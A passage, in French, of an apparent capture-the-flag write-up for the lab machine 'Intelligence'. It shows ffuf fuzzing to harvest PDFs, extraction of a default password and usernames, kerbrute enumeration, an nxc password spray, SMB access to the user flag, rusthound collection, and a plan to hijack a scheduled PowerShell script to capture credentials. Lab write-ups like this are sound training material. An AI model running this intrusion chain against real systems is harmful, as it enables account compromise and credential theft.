class="line"><span class="cl">from datetime import date, timedelta </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">def daterange<span class="o">(</span>start_date: date, end_date: date<span class="o">)</span>: </span></span><span class="line"><span class="cl"> <span class="nv">days</span> <span class="o">=</span> int<span class="o">((</span>end_date - start_date<span class="o">)</span>.days<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> n in range<span class="o">(</span>days<span class="o">)</span>: </span></span><span class="line"><span class="cl"> yield start_date + timedelta<span class="o">(</span>n<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">start_date</span> <span class="o">=</span> date<span class="o">(</span>2015, 1, 1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">end_date</span> <span class="o">=</span> date<span class="o">(</span>2022, 6, 2<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> single_date in daterange<span class="o">(</span>start_date, end_date<span class="o">)</span>: </span></span><span class="line"><span class="cl"> print<span class="o">(</span>single_date.strftime<span class="o">(</span><span class="s2">&#34;%Y-%m-%d&#34;</span><span class="o">))</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ensuite, on utilise <strong>ffuf</strong> pour faire du fuzzing et récupérer toutes les URL des potentiels fichiers téléchargeables :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ffuf -c -w dates.txt -u <span class="s2">&#34;http://intelligence.htb/documents/FUZZ-upload.pdf&#34;</span> -o results.json -of json </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://intelligence.htb/documents/FUZZ-upload.pdf </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /workspace/Intelligence/dates.txt </span></span><span class="line"><span class="cl"> :: Output file : results.json </span></span><span class="line"><span class="cl"> :: File format : json </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2020-01-01 <span class="o">[</span>Status: 200, Size: 26835, Words: 241, Lines: 209, Duration: 35ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-02 <span class="o">[</span>Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 31ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-25 <span class="o">[</span>Status: 200, Size: 26252, Words: 225, Lines: 193, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-20 <span class="o">[</span>Status: 200, Size: 11632, Words: 157, Lines: 127, Duration: 27ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-23 <span class="o">[</span>Status: 200, Size: 11557, Words: 167, Lines: 136, Duration: 35ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-22 <span class="o">[</span>Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 37ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-10 <span class="o">[</span>Status: 200, Size: 26400, Words: 232, Lines: 205, Duration: 40ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-04 <span class="o">[</span>Status: 200, Size: 27522, Words: 223, Lines: 196, Duration: 49ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-30 <span class="o">[</span>Status: 200, Size: 26706, Words: 242, Lines: 193, Duration: 39ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-24 <span class="o">[</span>Status: 200, Size: 27332, Words: 237, Lines: 206, Duration: 23ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-04 <span class="o">[</span>Status: 200, Size: 26194, Words: 235, Lines: 202, Duration: 21ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-28 <span class="o">[</span>Status: 200, Size: 11543, Words: 167, Lines: 131, Duration: 23ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-11 <span class="o">[</span>Status: 200, Size: 25245, Words: 241, Lines: 198, Duration: 29ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-17 <span class="o">[</span>Status: 200, Size: 11228, Words: 167, Lines: 132, Duration: 29ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-23 <span class="o">[</span>Status: 200, Size: 27378, Words: 247, Lines: 213, Duration: 33ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-05 <span class="o">[</span>Status: 200, Size: 26124, Words: 221, Lines: 205, Duration: 33ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-12 <span class="o">[</span>Status: 200, Size: 27143, Words: 233, Lines: 213, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-21 <span class="o">[</span>Status: 200, Size: 11250, Words: 157, Lines: 134, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">2021-03-25 <span class="o">[</span>Status: 200, Size: 27327, Words: 231, Lines: 211, Duration: 22ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2021-03-21 <span class="o">[</span>Status: 200, Size: 26810, Words: 229, Lines: 205, Duration: 31ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2021-03-27 <span class="o">[</span>Status: 200, Size: 12127, Words: 166, Lines: 141, Duration: 28ms<span class="o">]</span> </span></span><span class="line"><span class="cl">:: Progress: <span class="o">[</span>2709/2709<span class="o">]</span> :: Job <span class="o">[</span>1/1<span class="o">]</span> :: <span class="m">1562</span> req/sec :: Duration: <span class="o">[</span>0:00:01<span class="o">]</span> :: Errors: <span class="m">0</span> :: </span></span></code></pre></td></tr></table> </div> </div><p>Il faut ensuite parcourir cette liste d&rsquo;url pour télécharger tous les fichiers. En Python, ça nous donne le code suivant :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat ffuf_dl.py </span></span><span class="line"><span class="cl">import json </span></span><span class="line"><span class="cl">import subprocess </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">with open<span class="o">(</span><span class="s2">&#34;results.json&#34;</span><span class="o">)</span> as f: </span></span><span class="line"><span class="cl"> <span class="nv">data</span> <span class="o">=</span> json.load<span class="o">(</span>f<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> result in data<span class="o">[</span><span class="s2">&#34;results&#34;</span><span class="o">]</span>: </span></span><span class="line"><span class="cl"> <span class="nv">url</span> <span class="o">=</span> result<span class="o">[</span><span class="s2">&#34;url&#34;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"> print<span class="o">(</span>f<span class="s2">&#34;[*] Téléchargement de {url}&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> subprocess.run<span class="o">([</span><span class="s2">&#34;wget&#34;</span>, <span class="s2">&#34;-q&#34;</span>, <span class="s2">&#34;-P&#34;</span>, <span class="s2">&#34;pdfs/&#34;</span>, url<span class="o">])</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dans le dossier pdfs/ se trouve une grande quantité de fichiers</p> <h3 id="password-found-in-pdfs">Password found in pdfs </h3><p>J&rsquo;ai utilisé la commande <strong>pdftotext</strong> afin de convertir les pdfs en texte. Ensuite, en affichant le texte de tous les pdfs et en recherchant le mot clé &ldquo;password&rdquo;, on trouve un match ! Le mot de passe : <code>NewIntelligenceCorpUser9876</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span class="k">for</span> f in *.pdf </span></span><span class="line"><span class="cl"><span class="k">do</span> </span></span><span class="line"><span class="cl"> pdftotext <span class="nv">$f</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl">$ cat *.txt <span class="p">|</span> grep -i password -A3 -B3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">New Account Guide </span></span><span class="line"><span class="cl">Welcome to Intelligence Corp! </span></span><span class="line"><span class="cl">Please login using your username and the default password of: </span></span><span class="line"><span class="cl">NewIntelligenceCorpUser9876 </span></span><span class="line"><span class="cl">After logging in please change your password as soon as possible. </span></span></code></pre></td></tr></table> </div> </div><p>On trouve également le message suivant:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Internal IT Update </span></span><span class="line"><span class="cl">There has recently been some outages on our web servers. Ted has gotten a </span></span><span class="line"><span class="cl">script in place to <span class="nb">help</span> notify us <span class="k">if</span> this happens again. </span></span><span class="line"><span class="cl">Also, after discussion following our recent security audit we are in the process </span></span><span class="line"><span class="cl">of locking down our service accounts. </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-list-from-pdfs-creators">User list from pdfs creators </h3><p>En utilisant <strong>exiftool</strong>, on peut recuperer beaucoup d&rsquo;information sur les PDFs et notamment le nom des createurs ayant généré les pdfs. On peut alors obtenir une liste d&rsquo;utilisateurs potentiels</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">exiftool pdfs/*.pdf <span class="p">|</span> grep -i creator <span class="p">|</span> awk <span class="s1">&#39;{print $3}&#39;</span> </span></span><span class="line"><span class="cl">William.Lee </span></span><span class="line"><span class="cl">Scott.Scott </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Tiffany.Molina &lt;----------- </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Ian.Duncan </span></span><span class="line"><span class="cl">Richard.Williams </span></span></code></pre></td></tr></table> </div> </div><p>Avec kerbrute, on peut vérifier si les utilisateurs existent. Une très grosse partie existe en vérité. Avec nxc on effectue un password spray et on trouve les credentials suivants: <code>intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt </span></span><span class="line"><span class="cl"> __ __ __ </span></span><span class="line"><span class="cl"> / /_____ _____/ /_ _______ __/ /____ </span></span><span class="line"><span class="cl"> / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\ </span></span></span><span class="line"><span class="cl"> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ </span></span><span class="line"><span class="cl">/_/<span class="p">|</span>_<span class="p">|</span><span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Version: dev <span class="o">(</span>n/a<span class="o">)</span> - 09/03/25 - Ronnie Flathers @ropnop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; Using KDC<span class="o">(</span>s<span class="o">)</span>: </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; dc.intelligence.htb:88 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Stephanie.Young@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Veronica.Patel@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Jason.Wright@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: David.Reed@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Scott.Scott@intelligence.htb </span></span><span class="line"><span class="cl">...... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.10.248 -u users.txt -p pass.txt </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:intelligence.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\W</span>illiam.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\J</span>ason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\R</span>ichard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> intelligence.htb<span class="se">\T</span>iffany.Molina:NewIntelligenceCorpUser9876 </span></span></code></pre></td></tr></table> </div> </div><h3 id="tiffanymolina--user-flag">Tiffany.Molina : user flag </h3><p>On trouve un Share <strong>User</strong> accessible en lecture par Tiffany. On trouve finalement les fichiers de Tiffany et le flag user.txt</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient //10.10.10.248/users -U <span class="s1">&#39;Tiffany.Molina%NewIntelligenceCorpUser9876&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Administrator D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:18:39 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> All Users DHSrn <span class="m">0</span> Sat Sep <span class="m">15</span> 09:21:46 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Default DHR <span class="m">0</span> Mon Apr <span class="m">19</span> 04:17:40 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Default User DHSrn <span class="m">0</span> Sat Sep <span class="m">15</span> 09:21:46 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> desktop.ini AHS <span class="m">174</span> Sat Sep <span class="m">15</span> 09:11:27 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Public DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:18:39 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Ted.Graves D <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Tiffany.Molina D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453992</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> Tiffany.molina </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\&gt;</span> <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> user.txt AR <span class="m">34</span> Wed Sep <span class="m">3</span> 21:31:06 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453992</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> get user.txt </span></span><span class="line"><span class="cl">getting file <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt of size <span class="m">34</span> as user.txt <span class="o">(</span>0.2 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 0.2 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> </span></span><span class="line"><span class="cl">$ cat user.txt </span></span><span class="line"><span class="cl">359b.....159e </span></span></code></pre></td></tr></table> </div> </div><h3 id="rusthound-bloodhound">Rusthound bloodhound </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ rusthound -d intelligence.htb -u <span class="s2">&#34;Tiffany.Molina&#34;</span>@<span class="s2">&#34;intelligence.htb&#34;</span> -p <span class="s2">&#34;NewIntelligenceCorpUser9876&#34;</span> -o /workspace/Intelligence/bloodhount_data --zip -n 10.10.10.248 </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl">Initializing RustHound at 16:50:28 on 09/03/25 </span></span><span class="line"><span class="cl">Powered by g0h4n from OpenCyber </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound<span class="o">]</span> Verbosity level: Info </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> Connected to INTELLIGENCE.HTB Active Directory! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> Starting data collection... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> All data collected <span class="k">for</span> NamingContext <span class="nv">DC</span><span class="o">=</span>intelligence,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser<span class="o">]</span> Starting the LDAP objects parsing... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser::bh_41<span class="o">]</span> MachineAccountQuota: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser<span class="o">]</span> Parsing LDAP objects finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::checker<span class="o">]</span> Starting checker to replace some values... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::checker<span class="o">]</span> Checking and replacing some values finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">43</span> users parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">63</span> groups parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> computers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> ous parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> domains parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">2</span> gpos parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">21</span> containers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> /workspace/Intelligence/bloodhount_data/20250903165028_intelligence-htb_rusthound.zip created! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">RustHound Enumeration Completed at 16:50:29 on 09/03/25! Happy Graphing! </span></span></code></pre></td></tr></table> </div> </div><h2 id="tiffanymolina---tedgraves">Tiffany.Molina -&gt; Ted.Graves </h2><h3 id="smb--it-share">SMB : IT Share </h3><p>En se connectant au share <strong>IT</strong> on remarque un script <strong>powershell</strong>. Ce script parcourt tous les domaines DNS enregistrés commencant par &ldquo;web&rdquo; puis effectue une requête HTTP avec Invoke-WebRequest. Si le site n&rsquo;est pas actif, alors la requête echoue et un mail est envoyé à Ted.</p> <p>Il est indiqué que le script est executé toutes les 5mn, et vraisembablement est executé par Ted lui même. On remarque l&rsquo;utilisation du paramètre <strong>-UseDefaultCredentials</strong> ce qui signifie que les creds de celui qui l&rsquo;execute sont transmis lors de la requête.</p> <p>Si on arrive à detourner le script pour lui faire faire une requête vers notre ordinateur, on pourrait recupérer le mot de passe de Ted.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient //10.10.10.248/it -U <span class="s1">&#39;Tiffany.Molina%NewIntelligenceCorpUser9876&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> downdetector.ps1 A <span class="m">1046</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453177</span> blocks available </span></span><span 